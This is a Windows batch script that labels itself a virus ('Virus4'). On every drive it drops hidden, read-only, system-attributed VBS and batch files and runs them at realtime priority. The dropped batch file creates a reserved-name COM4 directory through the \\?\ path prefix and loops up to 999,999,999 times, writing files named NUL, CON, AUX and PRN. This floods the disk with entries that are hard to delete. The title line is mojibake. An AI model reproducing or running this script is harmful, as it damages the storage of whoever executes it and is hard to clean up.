@ECHO OFF
CHCP 936
CD "%~DP0"
FOR /F "TOKENS=3 DELIMS=," %%I IN ('TYPE CONFIG.INI') DO (COLOR %%I)
TITLE Virus4²¡¶¾±¬·¢ÖÐ...
CLS
FOR /F "SKIP=1" %%I IN ('WMIC LOGICALDISK GET CAPTION') DO (DEL /A /F /Q %%I\Vir4.bat %%I\Vir4.vbs>NUL)
FOR /F "SKIP=1" %%I IN ('WMIC LOGICALDISK GET CAPTION') DO (ECHO SET WS=WScript.CreateObject("WScript.Shell"^)>%%I\Vir4.vbs)
FOR /F "SKIP=1" %%I IN ('WMIC LOGICALDISK GET CAPTION') DO (ECHO WS.Run "CMD.EXE /K %%I\Vir4.bat",RunHide>>%%I\Vir4.vbs)
FOR /F "SKIP=1" %%I IN ('WMIC LOGICALDISK GET CAPTION') DO (ECHO @ECHO OFF>%%I\Vir4.bat)
FOR /F "SKIP=1" %%I IN ('WMIC LOGICALDISK GET CAPTION') DO (ECHO MD \\?\%%I\COM4 \\?\%%I\COM4..\>>%%I\Vir4.bat)
FOR /F "SKIP=1" %%I IN ('WMIC LOGICALDISK GET CAPTION') DO (ECHO SET A=^0>>%%I\Vir4.bat)
FOR /F "SKIP=1" %%I IN ('WMIC LOGICALDISK GET CAPTION') DO (ECHO.>>%%I\Vir4.bat)
FOR /F "SKIP=1" %%I IN ('WMIC LOGICALDISK GET CAPTION') DO (ECHO :S>>%%I\Vir4.bat)
FOR /F "SKIP=1" %%I IN ('WMIC LOGICALDISK GET CAPTION') DO (ECHO ECHO.^>\\?\%%I\COM4\NUL.%%A%%>>%%I\Vir4.bat)
FOR /F "SKIP=1" %%I IN ('WMIC LOGICALDISK GET CAPTION') DO (ECHO ECHO.^>\\?\%%I\COM4\CON.%%A%%>>%%I\Vir4.bat)
FOR /F "SKIP=1" %%I IN ('WMIC LOGICALDISK GET CAPTION') DO (ECHO ECHO.^>\\?\%%I\COM4\AUX.%%A%%>>%%I\Vir4.bat)
FOR /F "SKIP=1" %%I IN ('WMIC LOGICALDISK GET CAPTION') DO (ECHO ECHO.^>\\?\%%I\COM4\PRN.%%A%%>>%%I\Vir4.bat)
FOR /F "SKIP=1" %%I IN ('WMIC LOGICALDISK GET CAPTION') DO (ECHO SET /A A+=^1>>%%I\Vir4.bat)
FOR /F "SKIP=1" %%I IN ('WMIC LOGICALDISK GET CAPTION') DO (ECHO IF NOT %%A%%==999999999 ^(GOTO S^)>>%%I\Vir4.bat)
FOR /F "SKIP=1" %%I IN ('WMIC LOGICALDISK GET CAPTION') DO (ATTRIB +A +H +R +S %%I\Vir4.vbs)
FOR /F "SKIP=1" %%I IN ('WMIC LOGICALDISK GET CAPTION') DO (ATTRIB +A +H +R +S %%I\Vir4.bat)
FOR /F "SKIP=1" %%I IN ('WMIC LOGICALDISK GET CAPTION') DO (IF EXIST %%I\Vir4.vbs (START /REALTIME %%I\Vir4.vbs))
EXIT